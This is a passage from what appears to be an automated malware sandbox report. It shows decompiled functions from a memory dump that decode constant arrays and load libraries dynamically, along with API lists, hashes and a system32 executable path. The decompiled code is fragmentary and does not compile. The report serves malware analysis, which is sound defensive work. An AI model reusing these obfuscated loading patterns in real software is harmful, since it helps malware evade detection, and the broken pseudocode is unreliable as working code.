				 *((intOrPtr*)(_t163 - 0xe8)) = 0xe5761a4b;
				 *((intOrPtr*)(_t163 - 0xe4)) = 0x7e5f1912;
				 *((intOrPtr*)(_t163 - 0xe0)) = 0x4566e5df;
				 *((intOrPtr*)(_t163 - 0xdc)) = 0x31d3fc58;
				 *((intOrPtr*)(_t163 - 0xd8)) = 0x42ad45b1;
				 *((intOrPtr*)(_t163 - 0xd4)) = 0x26c6e81f;
				 *((intOrPtr*)(_t163 - 0xd0)) = 0x8c35f216;
				 *((intOrPtr*)(_t163 - 0xcc)) = 0xc57f604d;
				 *((intOrPtr*)(_t163 - 0xc8)) = 0xc680fd1c;
				 *((intOrPtr*)(_t163 - 0xc4)) = 0x2d8c26d6;
				 *((intOrPtr*)(_t163 - 0xc0)) = 0xa880798f;
				 *((intOrPtr*)(_t163 - 0xbc)) = 0x2b922658;
				 *((intOrPtr*)(_t163 - 0xb8)) = 0xea5892d;
				 *((intOrPtr*)(_t163 - 0xb4)) = 0x7097e74b;
				 *((intOrPtr*)(_t163 - 0xb0)) = 0x9e4287c3;
				 *((intOrPtr*)(_t163 - 0xac)) = 0x7ddd092d;
				 *((intOrPtr*)(_t163 - 0xa8)) = 0x9d72876c;
				 *((intOrPtr*)(_t163 - 0xa4)) = 0x687954f0;
				 *((intOrPtr*)(_t163 - 0xa0)) = 0xdc560dfd;
				 *((intOrPtr*)(_t163 - 0x9c)) = 0xc6ae8e76;
				 *((intOrPtr*)(_t163 - 0x98)) = 0x8b8a62f4;
				 *((intOrPtr*)(_t163 - 0x94)) = 0xecb223eb;
				 *((intOrPtr*)(_t163 - 0x90)) = 0x47121692;
				 *((intOrPtr*)(_t163 - 0x8c)) = 0xae2ee0d3;
				 *((intOrPtr*)(_t163 - 0x88)) = 0x4d4e6b59;
				 *((intOrPtr*)(_t163 - 0x84)) = 0x946b4306;
				 *((intOrPtr*)(_t163 - 0x80)) = 0xd476e44b;
				 *((intOrPtr*)(_t163 - 0x7c)) = 0x18a3fb60;
				 *((intOrPtr*)(_t163 - 0x78)) = 0xd6ef19a3;
				 *((intOrPtr*)(_t163 - 0x74)) = 0x15abf441;
				 *((intOrPtr*)(_t163 - 0x70)) = 0xdec4d0c9;
				 *((intOrPtr*)(_t163 - 0x6c)) = 0xd9403070;
				 *((intOrPtr*)(_t163 - 0x68)) = 0x8e8082e4;
				 *((intOrPtr*)(_t163 - 0x64)) = 0x26487421;
				 *((intOrPtr*)(_t163 - 0x60)) = 0x28c9a878;
				 *((intOrPtr*)(_t163 - 0x5c)) = 0x17178755;
				 *((intOrPtr*)(_t163 - 0x58)) = 0xfdb97c74;
				 *((intOrPtr*)(_t163 - 0x54)) = 0x54f28a82;
				 *((intOrPtr*)(_t163 - 0x50)) = 0x84c7bbdf;
				 *((intOrPtr*)(_t163 - 0x4c)) = 0x16f91cc5;
				 *((intOrPtr*)(_t163 - 0x48)) = 0x744cd88f;
				 *((intOrPtr*)(_t163 - 0x44)) = 0x1b61a938;
				 *((intOrPtr*)(_t163 - 0x40)) = 0x4115c6b9;
				 *((intOrPtr*)(_t163 - 0x3c)) = 0x267599c8;
				 *((intOrPtr*)(_t163 - 0x38)) = 0x648ba3c;
				 *((intOrPtr*)(_t163 - 0x34)) = 0xecb540f7;
				 *((intOrPtr*)(_t163 - 0x30)) = 0x89b84a5;
				 *((intOrPtr*)(_t163 - 0x2c)) = 0xb9e63541;
				 *((intOrPtr*)(_t163 - 0x28)) = 0xa1eb4040;
				 *((intOrPtr*)(_t163 - 0x24)) = 0xac5c6894;
				 *((intOrPtr*)(_t163 - 0x20)) = 0x15e21cd3;
				 *((intOrPtr*)(_t163 - 0x1c)) = 0x8a75a34c;
				 *((intOrPtr*)(_t163 - 0x18)) = 0xeec71677;
				 *((intOrPtr*)(_t163 - 0x14)) = 0x86e6e5b0;
				 *((intOrPtr*)(_t163 - 0x10)) = 0xe0065bd7;
				 *((intOrPtr*)(_t163 - 0xc)) = 0x831cc3a0;
				 *((intOrPtr*)(_t163 - 8)) = 0xdfe1953e;
				 *((intOrPtr*)(_t163 - 4)) = 0x6b032933;
				_t161 = L00111D00(0x122ef0, 0x1ac, _t159);
				 *0x127c74 = LoadLibraryW(_t161);
				_t152 = HeapFree(GetProcessHeap(), 0, _t161);
				_t156 =  *0x127c74; // 0x77740000
				_t162 = 0x1f5c6a;
				if(_t156 != 0) {
					goto 0x31167d;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return L00111480(_t154, _t156, _t163 - 0x24c, _t159, _t162);
				} else {
					goto 0x31166a;
					return _t152;
				}
			}

0x00116baa
0x00116bb4
0x00116bbe
0x00116bc8
0x00116bd2
0x00116bdc
0x00116be6
0x00116bf0
0x00116bfa
0x00116c04
0x00116c0e
0x00116c18
0x00116c22
0x00116c2c
0x00116c36
0x00116c40
0x00116c4a
0x00116c54
0x00116c5e
0x00116c68
0x00116c72
0x00116c7c
0x00116c86
0x00116c90
0x00116c9a
0x00116ca4
0x00116cae
0x00116cb8
0x00116cc2
0x00116ccc
0x00116cd6
0x00116ce0
0x00116cea
0x00116cf4
0x00116cfe
0x00116d08
0x00116d12
0x00116d1c
0x00116d26
0x00116d30
0x00116d3a
0x00116d44
0x00116d4e
0x00116d58
0x00116d62
0x00116d6c
0x00116d76
0x00116d80
0x00116d8a
0x00116d94
0x00116d9e
0x00116da8
0x00116db2
0x00116dbc
0x00116dc6
0x00116dd0
0x00116dda
0x00116de4
0x00116dee
0x00116df8
0x00116e02
0x00116e0c
0x00116e16
0x00116e20
0x00116e2a
0x00116e34
0x00116e3e
0x00116e48
0x00116e52
0x00116e5c
0x00116e66
0x00116e70
0x00116e7a
0x00116e84
0x00116e8e
0x00116e98
0x00116ea2
0x00116eac
0x00116eb6
0x00116ec0
0x00116ed4
0x00116ee3
0x00116eed
0x00116ef7
0x00116f01
0x00116f0b
0x00116f15
0x00116f1f
0x00116f29
0x00116f33
0x00116f3d
0x00116f47
0x00116f51
0x00116f5b
0x00116f65
0x00116f6f
0x00116f79
0x00116f83
0x00116f8d
0x00116f97
0x00116fa1
0x00116fab
0x00116fb5
0x00116fbf
0x00116fc9
0x00116fd3
0x00116fdd
0x00116fe7
0x00116ff1
0x00116ffb
0x00117005
0x0011700f
0x00117019
0x00117023
0x0011702d
0x00117037
0x0011703e
0x00117045
0x0011704c
0x00117053
0x0011705a
0x00117061
0x00117068
0x0011706f
0x00117076
0x0011707d
0x00117084
0x0011708b
0x00117092
0x00117099
0x001170a0
0x001170a7
0x001170ae
0x001170b5
0x001170bc
0x001170c3
0x001170ca
0x001170d1
0x001170d8
0x001170df
0x001170e6
0x001170ed
0x001170f4
0x001170fb
0x00117102
0x00117109
0x00117110
0x0011711f
0x0011712b
0x00117137
0x0011713d
0x00117143
0x00117146
0x0011714e
0x00117153
0x00117154
0x00117155
0x00117156
0x00117157
0x00117158
0x00117159
0x0011715a
0x0011715b
0x0011715c
0x0011716e
0x00117148
0x00117148
0x0011714d
0x0011714d

APIs

LoadLibraryW.KERNEL32(00000000), ref: 00117122
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00117130
HeapFree.KERNEL32(00000000), ref: 00117137

Strings

!tH&, xrefs: 00117068
{gB, xrefs: 00116F0B
91\_, xrefs: 00116EB6
YkNM, xrefs: 00117023
d4, xrefs: 00116E8E

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$FreeLibraryLoadProcess
String ID: !tH&$91\_$YkNM$d4${gB
API String ID: 872250060-3240151467
Opcode ID: 8dc683f4077cb2c88426c52719dee71e3907709bf04e423c5f71f3cad75c2f0b
Instruction ID: 7f449c2c3a45cbfa08c839ce097804df4de8dc41b6f735057667a6ce0a66bb96
Opcode Fuzzy Hash: 8dc683f4077cb2c88426c52719dee71e3907709bf04e423c5f71f3cad75c2f0b
Instruction Fuzzy Hash: C2C195B4C463A9DFDB659F929A847DDBA31BB15300F6082C8D6593B314CB750A82CF86

Uniqueness

Uniqueness Score: 100.00%

Function 0011F71E, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 22memoryUNIQUE

APIs

memset.NTDLL ref: 0011F720
_snwprintf.NTDLL ref: 0011F751
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011F75D
HeapFree.KERNEL32(00000000), ref: 0011F764

Strings

startedradar, xrefs: 0011F73A
C:\Windows\system32, xrefs: 0011F73F
C:\Windows\system32\startedradar.exe, xrefs: 0011F74C

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$FreeProcess_snwprintfmemset
String ID: C:\Windows\system32$C:\Windows\system32\startedradar.exe$startedradar
API String ID: 3735989449-1204595223
Opcode ID: 9596d8ee6f89deb860cc1a8c784958f16586f2e62b5c5399683c0784e580b417
Instruction ID: 5636ceef5cb6c1f43f3637c9f63d5bfec67bc0455de77c38df4d4bb1780fd9f7
Opcode Fuzzy Hash: 9596d8ee6f89deb860cc1a8c784958f16586f2e62b5c5399683c0784e580b417
Instruction Fuzzy Hash: 53E0C230249320BBEB2027E27C8EB9F3906DB047B7F110410FA06699C1CBB108F283A2

Uniqueness

Uniqueness Score: 100.00%

Function 001124E9, Relevance: 12.1, APIs: 8, Instructions: 59
memorystringCOMMON

C-Code - Quality: 30%

			E001124E9(void* __ebx, int __edi, intOrPtr* __esi) {
				int _t20;
				short* _t23;
				void* _t24;
				void* _t39;
				void* _t42;
				void* _t43;
				long* _t44;
				int _t46;
				signed int _t48;
				intOrPtr* _t49;
				void* _t51;
				long _t52;
				WCHAR* _t54;
				void* _t55;

				_t49 = __esi;
				_t46 = __edi;
				_t39 = __ebx;
				do {
					_t1 = _t49 + 4; // 0x4
					_t20 = lstrlenW(_t1);
					_t49 =  *_t49;
					_t39 = _t39 + 1 + _t20;
				} while (_t49 != 0);
				_t23 = RtlAllocateHeap(GetProcessHeap(), 8, _t39 + _t39);
				 *(_t55 - 4) = _t23;
				if(_t23 == 0) {
					_t46 =  *(_t55 - 0xc);
				} else {
					_t42 =  *(_t55 - 8);
					while(_t42 != 0) {
						_t5 = _t42 + 4; // 0x4
						_t54 = _t5;
						lstrcpyW( &(_t23[_t46]), _t54);
						_t48 = _t46 + lstrlenW(_t54);
						_t23 =  *(_t55 - 4);
						_t23[_t48] = 0x2c;
						_t46 = _t48 + 1;
						_t42 =  *_t42;
					}
					_t43 = 0;
					_t52 = WideCharToMultiByte(0xfde9, 0, _t23, _t46, 0, 0, 0, 0);
					 *(_t55 - 0x14) = _t52;
					if(_t52 != 0) {
						_t43 = RtlAllocateHeap(GetProcessHeap(), 8, _t52);
						if(_t43 == 0) {
							goto L10;
						} else {
							goto 0x310916;
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							WideCharToMultiByte();
							_t44 =  *(_t55 - 0x10);
							if(_t44 != 0) {
								 *_t44 =  *(_t55 - 0x14);
							}
						}
					}
					goto 0x310936;
					asm("int3");
					 *_t46 = _t43;
					HeapFree(GetProcessHeap(), ??, ??);
				}
				_t24 =  *(_t55 - 8);
				if(_t24 != 0) {
					do {
						_t51 =  *_t24;
						HeapFree(GetProcessHeap(), 0, _t24);
						_t24 = _t51;
					} while (_t51 != 0);
				}
				return 0 |  *_t46 != 0x00000000;
			}

0x001124e9
0x001124e9
0x001124e9
0x001124f0
0x001124f0
0x001124f4
0x001124fa
0x001124fd
0x001124ff
0x00112510
0x00112516
0x0011251b
0x001125c5
0x00112521
0x00112521
0x00112526
0x00112528
0x00112528
0x00112530
0x0011253d
0x00112544
0x00112547
0x0011254b
0x0011254c
0x0011254e
0x00112552
0x00112566
0x00112568
0x0011256d
0x0011257f
0x00112583
0x00000000
0x00112585
0x00112585
0x0011258a
0x0011258b
0x0011258c
0x0011258d
0x0011258e
0x0011258f
0x00112590
0x00112591
0x00112592
0x00112593
0x00112594
0x00112595
0x00112596
0x00112597
0x0011259d
0x001125a2
0x001125a7
0x001125a7
0x001125a2
0x00112583
0x001125ae
0x001125b3
0x001125b4
0x001125bd
0x001125bd
0x001125c8
0x001125cd
0x001125d0
0x001125d0
0x001125dc
0x001125e2
0x001125e4
0x001125d0
0x001125f5

APIs

lstrlenW.KERNEL32(00000004), ref: 001124F4
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00112509
RtlAllocateHeap.NTDLL(00000000), ref: 00112510
lstrcpyW.KERNEL32(00000000,00000004), ref: 00112530
lstrlenW.KERNEL32(00000004), ref: 00112537
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00112560
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00112572
RtlAllocateHeap.NTDLL(00000000), ref: 00112579
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001125D5
HeapFree.KERNEL32(00000000), ref: 001125DC

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$Process$Allocatelstrlen$ByteCharFreeMultiWidelstrcpy
String ID:
API String ID: 3825671978-0
Opcode ID: 598d34506f6e52e81b10ce389fe7f4d959bff76e10d4c2bc6fc560ca6351b038
Instruction ID: 3a1fe0ee51ce91fce790bb49de99cbaa170bc961cbd2b3981bdd29443c7faec5
Opcode Fuzzy Hash: 598d34506f6e52e81b10ce389fe7f4d959bff76e10d4c2bc6fc560ca6351b038
Instruction Fuzzy Hash: C0113671901715EFEB709FE4DCD8EAA77ADEF08748B040424FA01D7650DB709EA68BA1

Uniqueness

Uniqueness Score: 1.85%

Function 0011843A, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 195
memorylibraryUNIQUE

C-Code - Quality: 93%

			E0011843A(void* __esi, void* __eflags) {
				int _t180;
				void* _t182;
				intOrPtr _t184;
				void* _t187;
				void* _t189;
				void* _t190;
				void* _t191;

				 *((intOrPtr*)(_t191 - 0x2bc)) = 0xffb6f3db;
				 *((intOrPtr*)(_t191 - 0x2b8)) = 0x42ee5917;
				 *((intOrPtr*)(_t191 - 0x2b4)) = 0xcb3b48c1;
				 *((intOrPtr*)(_t191 - 0x2b0)) = 0xa6520082;
				 *((intOrPtr*)(_t191 - 0x2ac)) = 0x5978cda3;
				 *((intOrPtr*)(_t191 - 0x2a8)) = 0x8eeb0cef;
				 *((intOrPtr*)(_t191 - 0x2a4)) = 0x7c3c2616;
				 *((intOrPtr*)(_t191 - 0x2a0)) = 0xf9e12a7d;
				 *((intOrPtr*)(_t191 - 0x29c)) = 0xd1129a86;
				 *((intOrPtr*)(_t191 - 0x298)) = 0x19026469;
				 *((intOrPtr*)(_t191 - 0x294)) = 0x81808771;
				 *((intOrPtr*)(_t191 - 0x290)) = 0xb80a64b0;
				 *((intOrPtr*)(_t191 - 0x28c)) = 0x567d0021;
				 *((intOrPtr*)(_t191 - 0x288)) = 0x84daafe4;
				 *((intOrPtr*)(_t191 - 0x284)) = 0x52328f;
				 *((intOrPtr*)(_t191 - 0x280)) = 0x79c5bc63;
				 *((intOrPtr*)(_t191 - 0x27c)) = 0x18ee37f2;
				 *((intOrPtr*)(_t191 - 0x278)) = 0x759352e0;
				 *((intOrPtr*)(_t191 - 0x274)) = 0x972b7044;
				 *((intOrPtr*)(_t191 - 0x270)) = 0xb36a66b1;
				 *((intOrPtr*)(_t191 - 0x26c)) = 0x2522e1d5;
				 *((intOrPtr*)(_t191 - 0x268)) = 0xcaea6a5e;
				 *((intOrPtr*)(_t191 - 0x264)) = 0xaec4e5b9;
				 *((intOrPtr*)(_t191 - 0x260)) = 0x8a5f01fa;
				 *((intOrPtr*)(_t191 - 0x25c)) = 0xbb77f3f7;
				 *((intOrPtr*)(_t191 - 0x258)) = 0x50f1bf85;
				 *((intOrPtr*)(_t191 - 0x254)) = 0xe281bbb7;
				 *((intOrPtr*)(_t191 - 0x250)) = 0x998865c4;
				 *((intOrPtr*)(_t191 - 0x24c)) = 0x62370433;
				 *((intOrPtr*)(_t191 - 0x248)) = 0xa291a2b3;
				 *((intOrPtr*)(_t191 - 0x244)) = 0xbba8d9cf;
				 *((intOrPtr*)(_t191 - 0x240)) = 0x91a70b;
				 *((intOrPtr*)(_t191 - 0x23c)) = 0x9c03d728;
				 *((intOrPtr*)(_t191 - 0x238)) = 0x847a151e;
				 *((intOrPtr*)(_t191 - 0x234)) = 0x2304bff;
				 *((intOrPtr*)(_t191 - 0x230)) = 0xbed58740;
				 *((intOrPtr*)(_t191 - 0x22c)) = 0x1c2240c7;
				 *((intOrPtr*)(_t191 - 0x228)) = 0x12d0bb03;
				 *((intOrPtr*)(_t191 - 0x224)) = 0xe98e44a1;
				 *((intOrPtr*)(_t191 - 0x220)) = 0x7a77d8c4;
				 *((intOrPtr*)(_t191 - 0x21c)) = 0xdcd3285e;
				 *((intOrPtr*)(_t191 - 0x218)) = 0xe0b58a70;
				 *((intOrPtr*)(_t191 - 0x214)) = 0xaf855e10;
				 *((intOrPtr*)(_t191 - 0x210)) = 0x368de6d9;
				 *((intOrPtr*)(_t191 - 0x20c)) = 0x40b905fa;
				 *((intOrPtr*)(_t191 - 0x208)) = 0x74f97d88;
				 *((intOrPtr*)(_t191 - 0x204)) = 0x55b6dcc6;
				 *((intOrPtr*)(_t191 - 0x200)) = 0xb1cc33f;
				 *((intOrPtr*)(_t191 - 0x1fc)) = 0xc3456997;
				 *((intOrPtr*)(_t191 - 0x1f8)) = 0xdd35737e;
				 *((intOrPtr*)(_t191 - 0x1f4)) = 0xb36b92a9;
				 *((intOrPtr*)(_t191 - 0x1f0)) = 0xde8e79a1;
				 *((intOrPtr*)(_t191 - 0x1ec)) = 0xf23453a2;
				 *((intOrPtr*)(_t191 - 0x1e8)) = 0xaaf7674b;
				 *((intOrPtr*)(_t191 - 0x1e4)) = 0x3fd813b0;
				 *((intOrPtr*)(_t191 - 0x1e0)) = 0x60beee96;
				 *((intOrPtr*)(_t191 - 0x1dc)) = 0x9781008e;
				 *((intOrPtr*)(_t191 - 0x1d8)) = 0x4aa3e6d3;
				 *((intOrPtr*)(_t191 - 0x1d4)) = 0x16cff405;
				 *((intOrPtr*)(_t191 - 0x1d0)) = 0xc7cd086c;
				 *((intOrPtr*)(_t191 - 0x1cc)) = 0x7fa1c49;
				 *((intOrPtr*)(_t191 - 0x1c8)) = 0xf2da8f0b;
				 *((intOrPtr*)(_t191 - 0x1c4)) = 0x5a45cf8b;
				 *((intOrPtr*)(_t191 - 0x1c0)) = 0x3a9cda52;
				 *((intOrPtr*)(_t191 - 0x1bc)) = 0x320d7194;
				 *((intOrPtr*)(_t191 - 0x1b8)) = 0x5736192c;
				 *((intOrPtr*)(_t191 - 0x1b4)) = 0xd8ce2db8;
				 *((intOrPtr*)(_t191 - 0x1b0)) = 0x1de4ee69;
				 *((intOrPtr*)(_t191 - 0x1ac)) = 0xe8ae66c8;
				 *((intOrPtr*)(_t191 - 0x1a8)) = 0x2c44325f;
				 *((intOrPtr*)(_t191 - 0x1a4)) = 0xed6ce4a8;
				 *((intOrPtr*)(_t191 - 0x1a0)) = 0x82bd0342;
				 *((intOrPtr*)(_t191 - 0x19c)) = 0x225078dd;
				 *((intOrPtr*)(_t191 - 0x198)) = 0x69abbb87;
				 *((intOrPtr*)(_t191 - 0x194)) = 0xa9d4ed32;
				 *((intOrPtr*)(_t191 - 0x190)) = 0x8050fb55;
				 *((intOrPtr*)(_t191 - 0x18c)) = 0x39db400e;
				 *((intOrPtr*)(_t191 - 0x188)) = 0x11b86bf1;
				 *((intOrPtr*)(_t191 - 0x184)) = 0xff2e0d55;
				 *((intOrPtr*)(_t191 - 0x180)) = 0x905b27a0;
				 *((intOrPtr*)(_t191 - 0x17c)) = 0xa6cc43d0;
				 *((intOrPtr*)(_t191 - 0x178)) = 0x248399f0;
				 *((intOrPtr*)(_t191 - 0x174)) = 0x61fdc396;
				 *((intOrPtr*)(_t191 - 0x170)) = 0x55d41932;
				 *((intOrPtr*)(_t191 - 0x16c)) = 0x3cb6d6d2;
				 *((intOrPtr*)(_t191 - 0x168)) = 0x602f81fc;
				 *((intOrPtr*)(_t191 - 0x164)) = 0x96fe0e2a;
				 *((intOrPtr*)(_t191 - 0x160)) = 0xadb4daa8;
				 *((intOrPtr*)(_t191 - 0x15c)) = 0x4ba1d5c1;
				 *((intOrPtr*)(_t191 - 0x158)) = 0xaeb36b38;
				 *((intOrPtr*)(_t191 - 0x154)) = 0x94d0b9c4;
				 *((intOrPtr*)(_t191 - 0x150)) = 0x442d53bf;
				 *((intOrPtr*)(_t191 - 0x14c)) = 0x3293833a;
				 *((intOrPtr*)(_t191 - 0x148)) = 0xb37bca59;
				 *((intOrPtr*)(_t191 - 0x144)) = 0x8c41f99d;
				 *((intOrPtr*)(_t191 - 0x140)) = 0x7af39d97;
				 *((intOrPtr*)(_t191 - 0x13c)) = 0x6cfa7f9a;
				 *((intOrPtr*)(_t191 - 0x138)) = 0xb2cb25cc;
				 *((intOrPtr*)(_t191 - 0x134)) = 0xb742fb49;
				 *((intOrPtr*)(_t191 - 0x130)) = 0x9e19e072;
				 *((intOrPtr*)(_t191 - 0x12c)) = 0x7435f9d3;
				 *((intOrPtr*)(_t191 - 0x128)) = 0x6151d2d;
				 *((intOrPtr*)(_t191 - 0x124)) = 0xb8c81b4e;
				 *((intOrPtr*)(_t191 - 0x120)) = 0xa0a74801;
				 *((intOrPtr*)(_t191 - 0x11c)) = 0x9254b144;
				 *((intOrPtr*)(_t191 - 0x118)) = 0xbf9a9ef;
				 *((intOrPtr*)(_t191 - 0x114)) = 0x664eea5e;
				 *((intOrPtr*)(_t191 - 0x110)) = 0xef5c68d3;
				 *((intOrPtr*)(_t191 - 0x10c)) = 0x663adb83;
				 *((intOrPtr*)(_t191 - 0x108)) = 0x698be370;
				 *((intOrPtr*)(_t191 - 0x104)) = 0xc6ab9f43;
				 *((intOrPtr*)(_t191 - 0x100)) = 0x2cb41cee;
				 *((intOrPtr*)(_t191 - 0xfc)) = 0x47d7bebb;
				 *((intOrPtr*)(_t191 - 0xf8)) = 0x33a7852f;
				 *((intOrPtr*)(_t191 - 0xf4)) = 0xa1c5614b;
				 *((intOrPtr*)(_t191 - 0xf0)) = 0xa7986281;
				 *((intOrPtr*)(_t191 - 0xec)) = 0xd5f1e78;
				 *((intOrPtr*)(_t191 - 0xe8)) = 0x394359d2;
				 *((intOrPtr*)(_t191 - 0xe4)) = 0x63aa5408;
				 *((intOrPtr*)(_t191 - 0xe0)) = 0x882305a9;
				 *((intOrPtr*)(_t191 - 0xdc)) = 0x4db9286a;
				 *((intOrPtr*)(_t191 - 0xd8)) = 0x628bddce;
				 *((intOrPtr*)(_t191 - 0xd4)) = 0x711914d8;
				 *((intOrPtr*)(_t191 - 0xd0)) = 0x69e7934f;
				 *((intOrPtr*)(_t191 - 0xcc)) = 0x38cb7c62;
				 *((intOrPtr*)(_t191 - 0xc8)) = 0xff47d5d8;
				 *((intOrPtr*)(_t191 - 0xc4)) = 0xe66607e0;
				 *((intOrPtr*)(_t191 - 0xc0)) = 0xffbe9a31;
				 *((intOrPtr*)(_t191 - 0xbc)) = 0xde0936dc;
				 *((intOrPtr*)(_t191 - 0xb8)) = 0xeeb91249;
				 *((intOrPtr*)(_t191 - 0xb4)) = 0x9a91cfec;
				 *((intOrPtr*)(_t191 - 0xb0)) = 0xd97b090f;
				 *((intOrPtr*)(_t191 - 0xac)) = 0x79e7a3b3;
				 *((intOrPtr*)(_t191 - 0xa8)) = 0xbf85e88a;
				 *((intOrPtr*)(_t191 - 0xa4)) = 0xd17b9713;
				 *((intOrPtr*)(_t191 - 0xa0)) = 0xb4a963a5;
				 *((intOrPtr*)(_t191 - 0x9c)) = 0x4e9dab1f;
				 *((intOrPtr*)(_t191 - 0x98)) = 0x26103dda;
				 *((intOrPtr*)(_t191 - 0x94)) = 0xcb4184e7;
				 *((intOrPtr*)(_t191 - 0x90)) = 0x29b9d4c3;
				 *((intOrPtr*)(_t191 - 0x8c)) = 0xb84826d1;
				 *((intOrPtr*)(_t191 - 0x88)) = 0x6691dcdb;
				 *((intOrPtr*)(_t191 - 0x84)) = 0xe77f285d;
				 *((intOrPtr*)(_t191 - 0x80)) = 0x63d37a01;
				 *((intOrPtr*)(_t191 - 0x7c)) = 0x9e07cefa;
				 *((intOrPtr*)(_t191 - 0x78)) = 0x8e456f03;
				 *((intOrPtr*)(_t191 - 0x74)) = 0xb191b1bc;
				 *((intOrPtr*)(_t191 - 0x70)) = 0xcdf1ff21;
				 *((intOrPtr*)(_t191 - 0x6c)) = 0xd53f95c1;
				 *((intOrPtr*)(_t191 - 0x68)) = 0xaed19769;
				 *((intOrPtr*)(_t191 - 0x64)) = 0x515166c1;
				 *((intOrPtr*)(_t191 - 0x60)) = 0xc4604900;
				 *((intOrPtr*)(_t191 - 0x5c)) = 0x7177c0f;
				 *((intOrPtr*)(_t191 - 0x58)) = 0xd6b03116;
				 *((intOrPtr*)(_t191 - 0x54)) = 0x48b81b3c;
				 *((intOrPtr*)(_t191 - 0x50)) = 0x7655b9b3;
				 *((intOrPtr*)(_t191 - 0x4c)) = 0x4c63c822;
				 *((intOrPtr*)(_t191 - 0x48)) = 0xdca9b450;
				 *((intOrPtr*)(_t191 - 0x44)) = 0x6562079a;
				 *((intOrPtr*)(_t191 - 0x40)) = 0xa503842e;
				 *((intOrPtr*)(_t191 - 0x3c)) = 0x97063634;
				 *((intOrPtr*)(_t191 - 0x38)) = 0xc165b32d;
				 *((intOrPtr*)(_t191 - 0x34)) = 0xbf230fad;
				 *((intOrPtr*)(_t191 - 0x30)) = 0x9b847890;
				 *((intOrPtr*)(_t191 - 0x2c)) = 0xa38ce9b0;
				 *((intOrPtr*)(_t191 - 0x28)) = 0xbae45a57;
				 *((intOrPtr*)(_t191 - 0x24)) = 0x39c26e65;
				 *((intOrPtr*)(_t191 - 0x20)) = 0x80e13151;
				 *((intOrPtr*)(_t191 - 0x1c)) = 0x4144edc3;
				 *((intOrPtr*)(_t191 - 0x18)) = 0xe2df436;
				 *((intOrPtr*)(_t191 - 0x14)) = 0x427bdf71;
				 *((intOrPtr*)(_t191 - 0x10)) = 0x8f267d87;
				 *((intOrPtr*)(_t191 - 0xc)) = 0x4d61d3e0;
				 *((intOrPtr*)(_t191 - 8)) = 0x6121230c;
				 *((intOrPtr*)(_t191 - 4)) = 0x766caa2a;
				_t189 = L00111D00(0x123930, 0x1f0, _t187);
				 *0x127c80 = LoadLibraryW(_t189);
				_t180 = HeapFree(GetProcessHeap(), 0, _t189);
				_t184 =  *0x127c80; // 0x0
				_t190 = 0x1f5c6a;
				if(_t184 != 0) {
					goto 0x31175c;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return L00111480(_t182, _t184, _t191 - 0x2bc, _t187, _t190);
				} else {
					goto 0x311749;
					return _t180;
				}
			}

0x0011843a
0x00118444
0x0011844e
0x00118458
0x00118462
0x0011846c
0x00118476
0x00118480
0x0011848a
0x00118494
0x0011849e
0x001184a8
0x001184b2
0x001184bc
0x001184c6
0x001184d0
0x001184da
0x001184e4
0x001184ee
0x001184f8
0x00118502
0x0011850c
0x00118516
0x00118520
0x0011852a
0x00118534
0x0011853e
0x00118548
0x00118552
0x0011855c
0x00118566
0x00118570
0x0011857a
0x00118584
0x0011858e
0x00118598
0x001185a2
0x001185ac
0x001185b6
0x001185c0
0x001185ca
0x001185d4
0x001185de
0x001185e8
0x001185f2
0x001185fc
0x00118606
0x00118610
0x0011861a
0x00118624
0x0011862e
0x00118638
0x00118642
0x0011864c
0x00118656
0x00118660
0x0011866a
0x00118674
0x0011867e
0x00118688
0x00118692
0x0011869c
0x001186a6
0x001186b0
0x001186ba
0x001186c4
0x001186ce
0x001186d8
0x001186e2
0x001186ec
0x001186f6
0x00118700
0x0011870a
0x00118714
0x0011871e
0x00118728
0x00118732
0x0011873c
0x00118746
0x00118750
0x0011875a
0x00118764
0x0011876e
0x00118778
0x00118782
0x0011878c
0x00118796
0x001187a0
0x001187aa
0x001187b4
0x001187be
0x001187c8
0x001187d2
0x001187dc
0x001187e6
0x001187f0
0x001187fa
0x00118804
0x0011880e
0x00118818
0x00118822
0x0011882c
0x00118836
0x00118840
0x0011884a
0x00118854
0x0011885e
0x00118868
0x00118872
0x0011887c
0x00118886
0x00118890
0x0011889a
0x001188a4
0x001188ae
0x001188b8
0x001188c2
0x001188cc
0x001188d6
0x001188e0
0x001188ea
0x001188f4
0x001188fe
0x00118908
0x00118912
0x0011891c
